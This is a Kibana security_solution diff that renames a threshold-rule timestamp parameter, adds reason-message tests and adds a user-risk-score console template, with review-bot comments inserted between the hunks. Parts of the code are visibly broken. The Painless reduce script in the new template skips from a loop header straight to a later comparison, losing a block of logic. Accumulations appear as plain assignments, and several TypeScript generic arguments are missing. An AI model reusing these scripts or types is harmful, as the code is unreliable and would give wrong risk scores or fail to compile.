diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts index 67deaec8e1d23..42c18e523f3d3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatter.test.ts 
@@ -5,39 +5,50 @@ * 2.0. */ -import { buildReasonMessageUtil } from './reason_formatters'; -import type { SignalSourceHit } from './types'; +import { buildReasonMessageForThresholdAlert, buildReasonMessageUtil } from './reason_formatters'; + +const mergedDoc = { + _index: 'index-1', + _id: 'id-1', + fields: { + 'destination.address': ['9.99.99.9'], + 'destination.port': ['6789'], + 'event.category': ['test'], + 'file.name': ['sample'], + 'host.name': ['host'], + 'process.name': ['doingThings.exe'], + 'process.parent.name': ['didThings.exe'], + 'source.address': ['1.11.11.1'], + 'source.port': ['1234'], + 'user.name': ['test-user'], + '@timestamp': '2021-08-11T02:28:59.101Z', + }, +}; + +const genThresholdMergedDoc = (groupedKeys: Record) => ({ + _index: 'index-1', + _id: 'some-id', + _source: { + '@timestamp': '2022-08-16T11:01:09.848Z', + threshold_result: [Object], + ...groupedKeys, + }, +}); describe('reason_formatter', () => { - let name: string; + let ruleName: string; let severity: string; - let mergedDoc: SignalSourceHit; beforeAll(() => { - name = 'my-rule'; + ruleName = 'my-rule'; severity = 'medium'; - mergedDoc = { - _index: 'index-1', - _id: 'id-1', - fields: { - 'destination.address': ['9.99.99.9'], - 'destination.port': ['6789'], - 'event.category': ['test'], - 'file.name': ['sample'], - 'host.name': ['host'], - 'process.name': ['doingThings.exe'], - 'process.parent.name': ['didThings.exe'], - 'source.address': ['1.11.11.1'], - 'source.port': ['1234'], - 'user.name': ['test-user'], - '@timestamp': '2021-08-11T02:28:59.101Z', - }, - }; }); describe('buildReasonMessageUtil', () => { describe('when rule and mergedDoc are provided', () => { it('should return the full reason message', () => { - expect(buildReasonMessageUtil({ name, severity, mergedDoc })).toMatchInlineSnapshot( + expect( + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc }) + ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file 
sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); }); @@ -52,7 +63,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"item one, item two event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); @@ -68,7 +79,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user created medium alert my-rule."` ); @@ -84,7 +95,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, on host created medium alert my-rule."` ); @@ -100,7 +111,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noDestinationPortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noDestinationPortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, destination 9.99.99.9 by test-user on host created medium alert my-rule."` ); 
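Review bot: `genThresholdMergedDoc` builds its `_source` with `threshold_result: [Object]`, which is an array containing the global `Object` constructor — this reads like pasted console output rather than an intended fixture value and will not resemble a real threshold result if any formatter starts reading it; use `threshold_result: []` or a small representative object instead. As rendered here the parameter is typed `(groupedKeys: Record)` with no type arguments, which does not compile under strict settings; if the generic arguments were lost in rendering this is moot, otherwise it should be `Record<string, string>`. The `mergedDoc` fixture moved to module scope is shared and mutable, so a test that mutates it (rather than spreading into `updatedMergedDoc` as the existing tests do) would leak into its neighbours; `as const` or `Object.freeze` on the fixture would make that explicit.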
@@ -115,7 +126,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noDestinationPortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noDestinationPortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1:1234, by test-user on host created medium alert my-rule."` ); @@ -131,7 +142,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noSourcePortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noSourcePortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, source 1.11.11.1 destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); @@ -146,7 +157,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: noSourcePortDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: noSourcePortDoc }) ).toMatchInlineSnapshot( `"test event with process doingThings.exe, parent process didThings.exe, file sample, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); @@ -163,7 +174,7 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot( `"test event with file sample, source 1.11.11.1:1234, destination 9.99.99.9:6789, by test-user on host created medium alert my-rule."` ); 
@@ -180,14 +191,61 @@ describe('reason_formatter', () => { }, }; expect( - buildReasonMessageUtil({ name, severity, mergedDoc: updatedMergedDoc }) + buildReasonMessageUtil({ name: ruleName, severity, mergedDoc: updatedMergedDoc }) ).toMatchInlineSnapshot(`"test event by test-user created medium alert my-rule."`); }); }); describe('when only rule is provided', () => { it('should return the reason message without host name or user name', () => { - expect(buildReasonMessageUtil({ name, severity })).toMatchInlineSnapshot(`""`); + expect(buildReasonMessageUtil({ name: ruleName, severity })).toMatchInlineSnapshot(`""`); + }); + }); + }); + + describe(`buildReasonMessageForThresholdAlert`, () => { + it('When thresold rule is grouped by user.name', () => { + const userName = 'Some User Name'; + const thresholdMergedDoc = genThresholdMergedDoc({ + 'user.name': userName, + }); + expect( + buildReasonMessageForThresholdAlert({ + name: ruleName, + severity, + mergedDoc: thresholdMergedDoc, + }) + ).toEqual(`event by ${userName} created ${severity} alert ${ruleName}.`); + }); + + it('When threshold rule is grouped by host.name', () => { + const hostName = 'Some Host Name'; + const thresholdMergedDoc = genThresholdMergedDoc({ + 'host.name': hostName, }); + + expect( + buildReasonMessageForThresholdAlert({ + name: ruleName, + severity, + mergedDoc: thresholdMergedDoc, + }) + ).toEqual(`event on ${hostName} created ${severity} alert ${ruleName}.`); + }); + it('When threshold rule is grouped by host.name and user.name', () => { + const hostName = 'Some Host Name'; + const userName = 'Some User Name'; + const thresholdMergedDoc = genThresholdMergedDoc({ + 'host.name': hostName, + 'user.name': userName, + }); + + expect( + buildReasonMessageForThresholdAlert({ + name: ruleName, + severity, + mergedDoc: thresholdMergedDoc, + }) + ).toEqual(`event by ${userName} on ${hostName} created ${severity} alert ${ruleName}.`); }); }); }); 
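Review bot: The first new test title is misspelled, `'When thresold rule is grouped by user.name'`, and should read `'When threshold rule is grouped by user.name'` to match the two titles that follow. The three new cases only cover `user.name` and `host.name` grouping; `buildReasonMessageForThresholdAlert` presumably yields a message without an actor or host when the rule groups on some other field, and a fourth case with an unrelated grouped key would pin that path, which the inline-snapshot tests above do for `buildReasonMessageUtil` but these do not.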
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts index 0b9148d995c74..88aa69186e58a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/reason_formatters.ts @@ -35,7 +35,7 @@ interface ReasonFields { } const getFieldsFromDoc = (mergedDoc: SignalSourceHit) => { const reasonFields: ReasonFields = {}; - const docToUse = mergedDoc?.fields || mergedDoc; + const docToUse = mergedDoc?.fields || mergedDoc?._source || mergedDoc; reasonFields.destinationAddress = getOr(null, 'destination.address', docToUse); reasonFields.destinationPort = getOr(null, 'destination.port', docToUse); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts index f4851e77f2048..e3c7f8f5ee50e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_all_fields_with_source.ts @@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import type { SignalSource } from '../../types'; import { filterFieldEntries } from '../utils/filter_field_entries'; import type { FieldsType, MergeStrategyFunction } from '../types'; 
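Review bot: The new fallback `const docToUse = mergedDoc?.fields || mergedDoc?._source || mergedDoc;` has no comment explaining why `_source` is now consulted, and the reason is only visible in the sibling test change where threshold alerts carry their grouped keys under `_source` rather than `fields`; a comment such as `// threshold alerts carry the grouped-by values in _source, not fields` would make that explicit. Note the precedence means a hit that has both `fields` and `_source` still never looks at `_source`, which appears intended for ordinary search hits but is worth stating. `getFieldsFromDoc` continues outside the hunk.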
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts index a5c811bc1a5c1..f5863533ea283 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.test.ts @@ -370,9 +370,9 @@ describe('merge_missing_fields_with_source', () => { /** * tests for https://github.com/elastic/kibana/issues/135963 * This test will fail when we replace the import - * import { set } from '@elastic/safer-lodash-set'; + * import { set } from '@kbn/safer-lodash-set'; * to use the fp version - * import { set } from '@elastic/safer-lodash-set/fp'; + * import { set } from '@kbn/safer-lodash-set/fp'; * and switch around the return inside of filteredEntries.reduce * to be the following: * return set(fieldsKey, valueToMerge, merged); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts index 89695f6b562b0..c20f6b55301bd 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/strategies/merge_missing_fields_with_source.ts 
@@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { SignalSource } from '../../types'; import { filterFieldEntries } from '../utils/filter_field_entries'; import type { FieldsType, MergeStrategyFunction } from '../types'; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts index cc5096825951f..8bb490c2d62df 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/source_fields_merging/utils/recursive_unboxing_fields.ts @@ -6,7 +6,7 @@ */ import { get } from 'lodash/fp'; -import { set } from '@elastic/safer-lodash-set/fp'; +import { set } from '@kbn/safer-lodash-set/fp'; import type { SearchTypes } from '../../../../../../common/detection_engine/types'; import type { FieldsType } from '../types'; diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts index 41881d538927c..8330d545cf78f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.test.ts 
@@ -5,20 +5,19 @@ * 2.0. */ +import { TIMESTAMP } from '@kbn/rule-data-utils'; import { buildThresholdMultiBucketAggregation, buildThresholdSingleBucketAggregation, } from './build_threshold_aggregation'; describe('build_threshold_aggregation', () => { - const timestampField = '@timestamp'; - describe('build_threshold_multi_bucket_aggregation', () => { const threshold = { field: ['host.name', 'source.ip'], value: 2 }; it('Generates aggregation without cardinality', async () => { const aggs = buildThresholdMultiBucketAggregation({ threshold, - timestampField, + aggregatableTimestampField: TIMESTAMP, sortKeys: undefined, }); expect(aggs).toStrictEqual({ @@ -34,12 +33,12 @@ describe('build_threshold_aggregation', () => { }, max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }, @@ -74,7 +73,7 @@ describe('build_threshold_aggregation', () => { }; const aggs = buildThresholdMultiBucketAggregation({ threshold: thresholdWithCardinality, - timestampField, + aggregatableTimestampField: TIMESTAMP, sortKeys: undefined, }); expect(aggs).toStrictEqual({ @@ -103,12 +102,12 @@ describe('build_threshold_aggregation', () => { }, max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }, @@ -141,16 +140,19 @@ describe('build_threshold_aggregation', () => { const threshold = { field: [], value: 3 }; it('Generates aggregation without cardinality', async () => { - const aggs = buildThresholdSingleBucketAggregation({ threshold, timestampField }); + const aggs = buildThresholdSingleBucketAggregation({ + threshold, + aggregatableTimestampField: TIMESTAMP, + }); expect(aggs).toStrictEqual({ max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }); 
@@ -163,7 +165,7 @@ describe('build_threshold_aggregation', () => { }; const aggs = buildThresholdSingleBucketAggregation({ threshold: thresholdWithCardinality, - timestampField, + aggregatableTimestampField: TIMESTAMP, }); expect(aggs).toStrictEqual({ cardinality_count: { @@ -173,12 +175,12 @@ describe('build_threshold_aggregation', () => { }, max_timestamp: { max: { - field: '@timestamp', + field: TIMESTAMP, }, }, min_timestamp: { min: { - field: '@timestamp', + field: TIMESTAMP, }, }, }); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts index 6130013a0fe98..f0b808e743772 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/build_threshold_aggregation.ts @@ -10,11 +10,11 @@ import { shouldFilterByCardinality } from './utils'; export const buildThresholdMultiBucketAggregation = ({ threshold, - timestampField, + aggregatableTimestampField, sortKeys, }: { threshold: ThresholdNormalized; - timestampField: string; + aggregatableTimestampField: string; // eslint-disable-next-line @typescript-eslint/no-explicit-any sortKeys: Record | undefined; }) => { @@ -34,12 +34,12 @@ export const buildThresholdMultiBucketAggregation = ({ aggs: { max_timestamp: { max: { - field: timestampField, + field: aggregatableTimestampField, }, }, min_timestamp: { min: { - field: timestampField, + field: aggregatableTimestampField, }, }, ...(shouldFilterByCardinality(threshold) 
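Review bot: The renamed parameter `aggregatableTimestampField: string` in `buildThresholdMultiBucketAggregation` carries no documentation, and since the same name is introduced in `buildThresholdSingleBucketAggregation`, `FindThresholdSignalsParams` and `getThresholdBucketFilters` in the following hunks, a reader has to infer from the new test in find_threshold_signals.test.ts that it may be a runtime field rather than the rule's primary timestamp. A TSDoc line at this first declaration would fix that wherever the name is used, e.g. `/** Field the min/max timestamp aggregations run on. May be a runtime field (see TIMESTAMP_RUNTIME_FIELD) when a timestamp override is configured, in which case the same request must also carry its runtime mapping. */`. The same missing doc applies to the other three occurrences. buildThresholdMultiBucketAggregation's body continues outside the hunk.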
@@ -74,19 +74,19 @@ export const buildThresholdMultiBucketAggregation = ({ export const buildThresholdSingleBucketAggregation = ({ threshold, - timestampField, + aggregatableTimestampField, }: { threshold: ThresholdNormalized; - timestampField: string; + aggregatableTimestampField: string; }) => ({ max_timestamp: { max: { - field: timestampField, + field: aggregatableTimestampField, }, }, min_timestamp: { min: { - field: timestampField, + field: aggregatableTimestampField, }, }, ...(shouldFilterByCardinality(threshold) diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts index 1d17d1ed63966..acd444146dbc7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.test.ts @@ -13,6 +13,8 @@ import * as single_search_after from '../single_search_after'; import { findThresholdSignals } from './find_threshold_signals'; import { TIMESTAMP } from '@kbn/rule-data-utils'; import { ruleExecutionLogMock } from '../../rule_monitoring/mocks'; +import { buildTimestampRuntimeMapping } from '../../rule_types/utils'; +import { TIMESTAMP_RUNTIME_FIELD } from '../../rule_types/constants'; const queryFilter = getQueryFilter('', 'kuery', [], ['*'], []); const mockSingleSearchAfter = jest.fn(async () => ({ @@ -54,6 +56,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ 
@@ -89,6 +92,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -150,6 +154,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -223,6 +228,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ @@ -309,6 +315,7 @@ describe('findThresholdSignals', () => { runtimeMappings: undefined, primaryTimestamp: TIMESTAMP, secondaryTimestamp: undefined, + aggregatableTimestampField: TIMESTAMP, }); expect(mockSingleSearchAfter).toHaveBeenCalledWith( expect.objectContaining({ 
@@ -332,4 +339,62 @@ describe('findThresholdSignals', () => { }) ); }); + + it('should generate a threshold signal query with timestamp override', async () => { + const timestampOverride = 'event.ingested'; + const { aggregatableTimestampField, timestampRuntimeMappings } = { + aggregatableTimestampField: TIMESTAMP_RUNTIME_FIELD, + timestampRuntimeMappings: buildTimestampRuntimeMapping({ + timestampOverride, + }), + }; + + await findThresholdSignals({ + from: 'now-6m', + to: 'now', + maxSignals: 100, + inputIndexPattern: ['*'], + services: mockService, + ruleExecutionLogger, + filter: queryFilter, + threshold: { + cardinality: [ + { + field: 'source.ip', + value: 5, + }, + ], + field: [], + value: 200, + }, + runtimeMappings: timestampRuntimeMappings, + primaryTimestamp: timestampOverride, + secondaryTimestamp: TIMESTAMP, + aggregatableTimestampField, + }); + expect(mockSingleSearchAfter).toHaveBeenCalledWith( + expect.objectContaining({ + primaryTimestamp: timestampOverride, + secondaryTimestamp: TIMESTAMP, + runtimeMappings: buildTimestampRuntimeMapping({ timestampOverride }), + aggregations: { + cardinality_count: { + cardinality: { + field: 'source.ip', + }, + }, + max_timestamp: { + max: { + field: TIMESTAMP_RUNTIME_FIELD, + }, + }, + min_timestamp: { + min: { + field: TIMESTAMP_RUNTIME_FIELD, + }, + }, + }, + }) + ); + }); }); diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts index 21e66bbd069eb..63e293401a77a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/find_threshold_signals.ts 
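Review bot: The new test destructures an object literal it builds on the spot, `const { aggregatableTimestampField, timestampRuntimeMappings } = { … }`, which is several lines of indirection for two constants, and then recomputes `buildTimestampRuntimeMapping({ timestampOverride })` in the expectation instead of reusing the value it already has. Two plain declarations read more directly: `const aggregatableTimestampField = TIMESTAMP_RUNTIME_FIELD;` and `const timestampRuntimeMappings = buildTimestampRuntimeMapping({ timestampOverride });`, with the expectation using `runtimeMappings: timestampRuntimeMappings,`. The enclosing describe block starts outside the hunk.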
@@ -44,6 +44,7 @@ interface FindThresholdSignalsParams { runtimeMappings: estypes.MappingRuntimeFields | undefined; primaryTimestamp: TimestampOverride; secondaryTimestamp: TimestampOverrideOrUndefined; + aggregatableTimestampField: string; } const hasThresholdFields = (threshold: ThresholdNormalized) => !!threshold.field.length; @@ -65,6 +66,7 @@ export const findThresholdSignals = async ({ runtimeMappings, primaryTimestamp, secondaryTimestamp, + aggregatableTimestampField, }: FindThresholdSignalsParams): Promise<{ buckets: ThresholdBucket[]; searchDurations: string[]; @@ -85,7 +87,7 @@ export const findThresholdSignals = async ({ const { searchResult, searchDuration, searchErrors } = await singleSearchAfter({ aggregations: buildThresholdMultiBucketAggregation({ threshold, - timestampField: primaryTimestamp, + aggregatableTimestampField, sortKeys, }), index: inputIndexPattern, @@ -121,7 +123,7 @@ export const findThresholdSignals = async ({ const { searchResult, searchDuration, searchErrors } = await singleSearchAfter({ aggregations: buildThresholdSingleBucketAggregation({ threshold, - timestampField: primaryTimestamp, + aggregatableTimestampField, }), searchAfterSortIds: undefined, index: inputIndexPattern, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts index 8ae102ee75b99..b38351751a717 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.test.ts 
@@ -13,7 +13,7 @@ describe('getThresholdBucketFilters', () => { it('should generate filters for threshold signal detection with dupe mitigation', async () => { const result = await getThresholdBucketFilters({ signalHistory: sampleThresholdSignalHistory(), - primaryTimestamp: TIMESTAMP, + aggregatableTimestampField: TIMESTAMP, }); expect(result).toEqual([ { diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts index 786cda9d0a62c..a5ab1c4dc5cea 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/threshold/get_threshold_bucket_filters.ts @@ -15,10 +15,10 @@ import type { ThresholdSignalHistory, ThresholdSignalHistoryRecord } from '../ty */ export const getThresholdBucketFilters = async ({ signalHistory, - primaryTimestamp, + aggregatableTimestampField, }: { signalHistory: ThresholdSignalHistory; - primaryTimestamp: string; + aggregatableTimestampField: string; }): Promise => { const filters = Object.values(signalHistory).reduce( (acc: ESFilter[], bucket: ThresholdSignalHistoryRecord): ESFilter[] => { @@ -27,7 +27,7 @@ export const getThresholdBucketFilters = async ({ filter: [ { range: { - [primaryTimestamp]: { + [aggregatableTimestampField]: { // Timestamp of last event signaled on for this set of terms. lte: new Date(bucket.lastSignalTimestamp).toISOString(), }, diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts index 9d352da66935d..97147efc48df0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/signals/utils.ts 
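Review bot: The range filter is now keyed by `[aggregatableTimestampField]`, which per the new test in find_threshold_signals.test.ts may be a runtime field, and a range query on a runtime field only resolves when the search request carrying this filter also defines it in `runtime_mappings`; if a caller builds the filter with the runtime field name but sends the search without that mapping, the range likely matches nothing and the buckets this filter is meant to suppress would be signalled on again. The hunk does not show the callers, so this is worth confirming against them. A comment on the parameter would make the contract explicit: `// Must be aggregatable in the search this filter is sent with; a runtime field needs its mapping in the same request.` The reduce callback in getThresholdBucketFilters continues outside the hunk.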
@@ -594,7 +594,7 @@ export const getValidDateFromDoc = ({ if (tempMoment.isValid()) { return tempMoment.toDate(); } else if (typeof timestampValue === 'string') { - // worse case we have a string from fields API or other areas of Elasticsearch that have given us a number as a string, + // worst case we have a string from fields API or other areas of Elasticsearch that have given us a number as a string, // so we try one last time to parse this best we can by converting from string to a number const maybeDate = moment(+lastTimestamp); if (maybeDate.isValid()) { diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts index 687e4b5b65e4e..e4b786aa4822a 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_mappings.ts @@ -7,4 +7,5 @@ export const consoleMappings = { enable_host_risk_score: 'enable_host_risk_score.console', + enable_user_risk_score: 'enable_user_risk_score.console', }; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_templates/enable_user_risk_score.console b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_templates/enable_user_risk_score.console new file mode 100644 index 0000000000000..33e27178f0fb2 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/console_templates/enable_user_risk_score.console 
@@ -0,0 +1,244 @@ +# Click the run button of each step to enable the module +# Upload scripts +# 1. Script to assign risk level based on risk score +PUT _scripts/ml_userriskscore_levels_script +{ + "script": { + "lang": "painless", + "source": "double risk_score = (def)ctx.getByPath(params.risk_score);\nif (risk_score < 20) {\n ctx['risk'] = 'Unknown'\n}\nelse if (risk_score >= 20 && risk_score < 40) {\n ctx['risk'] = 'Low'\n}\nelse if (risk_score >= 40 && risk_score < 70) {\n ctx['risk'] = 'Moderate'\n}\nelse if (risk_score >= 70 && risk_score < 90) {\n ctx['risk'] = 'High'\n}\nelse if (risk_score >= 90) {\n ctx['risk'] = 'Critical'\n}" + } +} + +# 2. Map script for the User Risk Score transform +PUT _scripts/ml_userriskscore_map_script +{ + "script": { + "lang": "painless", "source": "// Get running sum of risk score per rule name per shard\\\\\nString rule_name = doc[\"signal.rule.name\"].value;\ndef stats = state.rule_risk_stats.getOrDefault(rule_name, 0.0);\nstats = doc[\"signal.rule.risk_score\"].value;\nstate.rule_risk_stats.put(rule_name, stats);" + } +} + +# 3. 
Reduce script for the User Risk Score transform +PUT _scripts/ml_userriskscore_reduce_script +{ + "script": { + "lang": "painless", + "source": "// Consolidating time decayed risks from across all shards\nMap total_risk_stats = new HashMap();\nfor (state in states) {\n for (key in state.rule_risk_stats.keySet()) {\n def rule_stats = state.rule_risk_stats.get(key);\n def stats = total_risk_stats.getOrDefault(key, 0.0);\n stats = rule_stats;\n total_risk_stats.put(key, stats);\n }\n}\n// Consolidating individual rule risks and arranging them in decreasing order\nList risks = new ArrayList();\nfor (key in total_risk_stats.keySet()) {\n risks.add(total_risk_stats[key])\n}\nCollections.sort(risks, Collections.reverseOrder());\n// Calculating total risk and normalizing it to a range\ndouble total_risk = 0.0;\ndouble risk_cap = params.max_risk * params.zeta_constant;\nfor (int i=0;i= 40 && total_norm_risk < 50) {\n total_norm_risk = 85 + (total_norm_risk - 40);\n}\nelse {\n total_norm_risk = 95 + (total_norm_risk - 50) / 10;\n}\n\nList rule_stats = new ArrayList();\nfor (key in total_risk_stats.keySet()) {\n Map temp = new HashMap();\n temp[\"rule_name\"] = key;\n temp[\"rule_risk\"] = total_risk_stats[key];\n rule_stats.add(temp);\n}\n\nreturn [\"risk_score\": total_norm_risk, \"rule_risks\": rule_stats];" + } +} + +# 4. Upload ingest pipeline +# Ingest pipeline to add ingest timestamp and risk level to documents +PUT _ingest/pipeline/ml_userriskscore_ingest_pipeline +{ + "processors": [ + { + "set": { + "field": "ingest_timestamp", + "value": "{{_ingest.timestamp}}" + } + }, + { + "fingerprint": { + "fields": [ + 